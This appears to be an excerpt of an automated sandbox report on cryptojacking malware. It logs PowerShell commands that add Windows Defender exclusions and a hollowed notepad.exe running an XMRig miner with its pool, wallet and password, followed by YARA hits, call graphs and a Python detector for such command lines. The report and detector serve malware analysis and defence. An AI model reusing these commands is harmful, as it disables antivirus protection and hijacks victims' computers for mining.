                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:19:04
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:08:19:04
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:08:19:05
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\notepad.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
                                                  Imagebase:0x7ff7c9fc0000
                                                  File size:201'216 bytes
                                                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.2939901627.0000000140751000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:7
                                                  Start time:08:19:07
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
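The two process entries above (notepad.exe carrying a full XMRig argument set, and powershell.exe adding Defender extension exclusions) are exactly the command lines a process-creation detection should catch. The Python below is an added example, not part of this report or of Joe Sandbox: it runs a small command-line detector over constructed process-creation events modelled on those two entries. The miner option list, the hollowed-host list and the sample events are assumptions for the example; the pool and wallet strings are copied from the notepad.exe command line above. It also decodes -EncodedCommand payloads before matching, which is what the report's Sigma hit on a Base64-encoded MpPreference cmdlet points at.

```python
import base64
import binascii
import ntpath
import re

# Constructed process-creation events modelled on the process tree in this
# report (hollowed notepad.exe running miner arguments; powershell.exe adding a
# Defender exclusion). Hand-written test input, not sandbox exports.
ENCODED_EXCLUSION = base64.b64encode(
    r"Add-MpPreference -ExclusionPath 'C:\Users\Public' -Force".encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    {   # notepad.exe hosting an XMRig (cinit fork) argument set, as in this report
        "image": r"C:\Windows\System32\notepad.exe",
        "commandline": (
            r'C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto '
            r"--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr "
            r"--url=pool.hashvault.pro:443 "
            r"--user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK "
            r"--pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-stealth"
        ),
    },
    {   # the Defender exclusion seen in this report, in clear text
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "commandline": "powershell -Command \"Add-MpPreference -ExclusionExtension @('exe','dll') -Force\"",
    },
    {   # same tampering hidden behind -EncodedCommand (base64 of UTF-16LE); constructed
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "commandline": f"powershell -nop -w hidden -enc {ENCODED_EXCLUSION}",
    },
    {   # benign notepad.exe launch; must not alert
        "image": r"C:\Windows\System32\notepad.exe",
        "commandline": r"C:\Windows\System32\notepad.exe C:\Users\user\notes.txt",
    },
]

# XMRig option names and option families (assumed list; the cinit-* options
# belong to the packed XMRig fork whose arguments appear in this report).
MINER_OPTS = {"url", "user", "pass", "algo", "coin", "donate-level", "asm",
              "cpu-memory-pool", "cpu-max-threads-hint", "nicehash", "tls"}
MINER_PREFIXES = ("randomx-", "cinit-", "cuda-", "opencl-")
# System binaries commonly hollowed to host a miner; assumed list for this example.
HOLLOW_HOSTS = {"notepad.exe", "explorer.exe", "svchost.exe", "conhost.exe",
                "dllhost.exe", "rundll32.exe", "dialer.exe"}

OPT_RE = re.compile(r'--([a-z][a-z0-9-]*)(?:=("[^"]*"|\S+))?')
# Monero primary address: 95 base58 chars starting with 4 (or 8 for subaddresses).
XMR_ADDR_RE = re.compile(r"\b[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")
MPPREF_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-(?:Exclusion(?:Path|Extension|Process|IpAddress)|Disable\w+)",
    re.I | re.S)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def parse_options(cmd):
    """Return {name: value} for every --name[=value] token in a command line."""
    return {name: value.strip('"') for name, value in OPT_RE.findall(cmd)}


def miner_indicators(opts):
    """Names of options that only make sense for an XMRig-style miner."""
    return {n for n in opts if n in MINER_OPTS or n.startswith(MINER_PREFIXES)}


def decoded_scripts(cmd):
    """Decode any -EncodedCommand payload so the rules see the real script text."""
    out = []
    for b64 in ENC_RE.findall(cmd):
        try:
            out.append(base64.b64decode(b64).decode("utf-16-le", errors="ignore"))
        except (binascii.Error, ValueError):
            continue
    return out


def analyze_event(event):
    cmd = event["commandline"]
    opts = parse_options(cmd)
    hits = miner_indicators(opts)
    result = {"image": event["image"], "alerts": [], "pool": None, "wallet": None}

    # A pool URL plus two more miner-only options, or any cinit-* option, is
    # enough to call the command line a miner; --user then usually holds the wallet.
    if ("url" in opts and len(hits) >= 3) or any(h.startswith("cinit-") for h in hits):
        result["alerts"].append("xmrig_commandline")
        result["pool"] = opts.get("url")
        m = XMR_ADDR_RE.search(opts.get("user", ""))
        result["wallet"] = m.group(0) if m else None
        if ntpath.basename(event["image"]).lower() in HOLLOW_HOSTS:
            result["alerts"].append("miner_in_system_binary")

    # Defender tampering: check the literal command line and any decoded -enc payload.
    if any(MPPREF_RE.search(text) for text in [cmd, *decoded_scripts(cmd)]):
        result["alerts"].append("defender_exclusion_tamper")
    return result


def scan(events):
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(ntpath.basename(r["image"]), r["alerts"], r["pool"], r["wallet"])
```

The miner rule keys on option combinations rather than on the image name, because here the image is a legitimate, signed notepad.exe; the extra miner_in_system_binary alert only raises severity. Extracting the pool and wallet from --url and --user gives the two indicators worth pivoting on across hosts, since the injected binary itself changes per campaign.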

                                                  Execution Graph

                                                  Execution Coverage:56.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:12
                                                  Total number of Limit Nodes:0
execution_graph (nodes are addresses; edges in execution order):
4022fa -> 40232c -> 40224f -> 402285 -> 4010c4 -> 402480 -> 4010e7 (memset) -> 40115b -> 401214 (sprintf) -> 4012bd -> 4022be -> 4023e5

                                                  Callgraph

callgraph (caller -> callees):
• Function_004022FA -> Function_0040224F
• Function_0040224F -> Function_004010C4, Function_004021EC, Function_00402158
• Function_004010C4 -> Function_00401000, Function_00401D58, Function_00401D18, Function_004019D8, Function_00401D98, Function_00401C98
• Function_00401D58, Function_00401D18, Function_004019D8, Function_00401D98, Function_00401C98 -> Function_004018EF
• Function_004018EF -> Function_004014B4
• Function_004014B4 -> Function_00401443, Function_00401970

                                                  Executed Functions

                                                  Control-flow Graph

                                                  APIs
Memory Dump Source
• Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
• API ID: memset, sprintf
                                                  • String ID:
                                                  • API String ID: 4041149307-0
                                                  • Opcode ID: e727ce3e58741238816f323a6d79e7f2e46f41a9eb5bf133fa8bd177935b8c99
                                                  • Instruction ID: f42f3db9e911078cd29f191bc02fc638327fde49476f8f6eb4d1a9ddc33515eb
                                                  • Opcode Fuzzy Hash: e727ce3e58741238816f323a6d79e7f2e46f41a9eb5bf133fa8bd177935b8c99
                                                  • Instruction Fuzzy Hash: 08712B61702B148DEB909B27DC5139A37A8F749FC8F804176EE4CA7B98EE3DCA448744

                                                  Control-flow Graph

control_flow_graph (basic blocks and edges):
• 401000-401045 (call 402478) -> 401048-401050
• 401048-401050 -> 4010b6-4010bb, 401056-4010b4
• 401056-4010b4 -> 401048-401050 (loop back)
                                                  Strings
                                                  • wa:!ssse5ql&=bd<6w$!r18=[isand=/, xrefs: 00401098
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wa:!ssse5ql&=bd<6w$!r18=[isand=/
                                                  • API String ID: 0-769508457
                                                  • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                  • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                  • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                  • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744

                                                  Control-flow Graph

                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5aa0e2a09c1abec3deb507259b7a255694b188a669ba650c1f241373fa21637f
                                                  • Instruction ID: b415c43fc2c1dcddfc336275db34ec18ce7294bf7f95de5c83b38c0f79690ff0
                                                  • Opcode Fuzzy Hash: 5aa0e2a09c1abec3deb507259b7a255694b188a669ba650c1f241373fa21637f
                                                  • Instruction Fuzzy Hash: BA2119A4301A1488EA95DB67DE5939933B8B749FC8F814436AE0CA73A5EF7CC5008354

                                                  Control-flow Graph

control_flow_graph: single block 40224f-4022ca (call 402158, call 4010c4, call 4021ec)
                                                  Similarity
• API ID: memset, sprintf
                                                  • String ID:
                                                  • API String ID: 4041149307-0
                                                  • Opcode ID: 2d44f8016637547563c89ddc85482b4c5d763b167245da18f53ac4b4f74bed44
                                                  • Instruction ID: e4f65d57c291f29f9d583fff8413c93034d11ea512355bbfc0681e4c65468b10
                                                  • Opcode Fuzzy Hash: 2d44f8016637547563c89ddc85482b4c5d763b167245da18f53ac4b4f74bed44
                                                  • Instruction Fuzzy Hash: 0D01DDB6701B8889DB50DF6ADD8538833A8B308FC8F014826AE0CA7B68DB38C6118744

                                                  Non-executed Functions

                                                  Control-flow Graph

control_flow_graph: single block 401d58-401d97 (call 4018ef)
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                  • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                  • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                  • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54

                                                  Control-flow Graph

control_flow_graph: single block 401d18-401d57 (call 4018ef)
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                  • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                  • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                  • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54

                                                  Control-flow Graph

control_flow_graph: single block 4019d8-401a17 (call 4018ef)
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                  • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                  • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                  • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94

                                                  Control-flow Graph

control_flow_graph: single block 401d98-401dd7 (call 4018ef)
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                  • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                  • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                  • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54

                                                  Control-flow Graph

control_flow_graph: single block 401c98-401cd7 (call 4018ef)
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                  • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                  • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                  • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54